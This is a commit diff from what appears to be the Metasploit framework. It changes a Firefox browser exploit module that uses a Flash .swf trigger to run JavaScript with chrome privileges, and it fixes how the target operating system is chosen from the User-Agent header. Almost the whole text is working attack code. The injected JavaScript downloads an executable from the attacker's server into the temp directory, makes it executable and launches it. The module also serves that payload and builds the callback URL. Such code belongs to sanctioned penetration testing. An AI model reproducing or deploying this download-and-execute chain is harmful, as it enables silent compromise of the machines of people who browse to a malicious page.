Fix target selection probs, and swf path
parent
aae4768563
commit
0e6576747a
|
@ -33,26 +33,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
with script access should be able to trigger it.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Targets' => [
|
||||
[ 'Windows x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86
|
||||
}
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[
|
||||
'Windows x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86
|
||||
}
|
||||
],
|
||||
[ 'Linux x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86
|
||||
}
|
||||
],
|
||||
[ 'Mac OS X x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
]
|
||||
],
|
||||
[ 'Linux x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86
|
||||
}
|
||||
],
|
||||
[ 'Mac OS X x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -78,12 +82,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
if target != get_target(request.headers['User-Agent'])
|
||||
print_status("User agent does not match an available payload type, bailing.")
|
||||
my_target = get_target(request.headers['User-Agent'])
|
||||
if my_target.nil?
|
||||
print_error("User agent does not match an available payload type, bailing.")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
target = my_target
|
||||
print_status(target.name)
|
||||
|
||||
if request.uri =~ /\.swf$/
|
||||
# send Flash .swf for navigating the frame to chrome://
|
||||
print_status("Sending .swf trigger.")
|
||||
|
@ -94,33 +102,38 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
send_response(cli, dropped_file_contents(cli), { 'Content-Type' => 'application/octet-stream' })
|
||||
else
|
||||
# send initial HTML page
|
||||
print_status("Target selected: #{target.name}")
|
||||
print_status("Sending #{self.name}")
|
||||
send_response_html(cli, generate_html)
|
||||
send_response_html(cli, generate_html(target))
|
||||
end
|
||||
handler(cli)
|
||||
end
|
||||
|
||||
# @return [String] the encoded executable for dropping onto the client's machine
|
||||
def dropped_file_contents(cli)
|
||||
regenerate_payload(cli).encoded_exe()
|
||||
return if ((p=regenerate_payload(cli)) == nil)
|
||||
generate_payload_exe( {:code=>p.encoded} )
|
||||
end
|
||||
|
||||
# @return [Msf::Module::Target] that matches the client's user-agent header
|
||||
def get_target(agent)
|
||||
# browser detection
|
||||
# Not firefox, bail
|
||||
if agent !~ /firefox/i
|
||||
return nil
|
||||
end
|
||||
|
||||
# User wants to manually specify a target, respect that
|
||||
if target != targets[0]
|
||||
return target
|
||||
end
|
||||
|
||||
# os detection
|
||||
if agent =~ /windows/i
|
||||
print_status 'Windows detected.'
|
||||
targets[0]
|
||||
elsif agent =~ /linux/i
|
||||
print_status 'Linux detected.'
|
||||
targets[1]
|
||||
elsif agent =~ /macintosh/i and agent =~ /intel/i
|
||||
print_status 'OSX detected.'
|
||||
elsif agent =~ /linux/i
|
||||
targets[2]
|
||||
elsif agent =~ /macintosh/i and agent =~ /intel/i
|
||||
targets[3]
|
||||
else
|
||||
nil
|
||||
end
|
||||
|
@ -133,8 +146,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# @return [String] the filename that will be used when the payload is dropped
|
||||
def payload_filename
|
||||
if target.name == 'Windows x86 (Native Payload)'
|
||||
def payload_filename(target)
|
||||
if target.name =~ /Windows x86/i
|
||||
"#{Rex::Text.rand_text_alphanumeric(8)}.exe"
|
||||
else
|
||||
"#{Rex::Text.rand_text_alphanumeric(8)}.bin"
|
||||
|
@ -142,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# @return [String] containing javascript code to execute with chrome privileges
|
||||
def js_payload
|
||||
def js_payload(target)
|
||||
%Q|
|
||||
#{js_debug("Injection successful. JS executing with chrome privileges.")}
|
||||
var x = new XMLHttpRequest;
|
||||
|
@ -153,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
var file = Components.classes["@mozilla.org/file/directory_service;1"]
|
||||
.getService(Components.interfaces.nsIProperties)
|
||||
.get("TmpD", Components.interfaces.nsIFile);
|
||||
file.append('#{payload_filename}');
|
||||
file.append('#{payload_filename(target)}');
|
||||
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
|
||||
.createInstance(Components.interfaces.nsIFileOutputStream);
|
||||
stream.init(file, 0x04 \| 0x08 \| 0x20, 0666, 0);
|
||||
|
@ -163,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
} else {
|
||||
stream.close();
|
||||
}
|
||||
#{chmod_code}
|
||||
#{chmod_code(target)}
|
||||
#{js_debug("'Downloaded to: '+file.path", "")}
|
||||
var process = Components.classes["@mozilla.org/process/util;1"]
|
||||
.createInstance(Components.interfaces.nsIProcess);
|
||||
|
@ -179,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# @return [String] containing javascript that will chmod the dropped executable
|
||||
def chmod_code
|
||||
def chmod_code(target)
|
||||
return '' if target.name == 'Windows x86 (Native Payload)'
|
||||
%Q|
|
||||
var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
|
||||
|
@ -194,15 +207,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def base_url
|
||||
proto = (datastore["SSL"] ? "https" : "http")
|
||||
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
"#{proto}://#{myhost}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
|
||||
"#{proto}://#{myhost}:#{datastore['SRVPORT']}#{get_resource}"
|
||||
end
|
||||
|
||||
# @return [String] HTML that is sent in the first response to the client
|
||||
def generate_html
|
||||
def generate_html(target)
|
||||
vars = {
|
||||
:symbol_id => 'a',
|
||||
:random_domain => 'safe',
|
||||
:payload => js_payload,
|
||||
:payload => js_payload(target),
|
||||
:payload_var => 'c',
|
||||
:payload_key => 'k',
|
||||
:payload_obj_var => 'payload_obj',
|
||||
|
|
Loading…
Reference in New Issue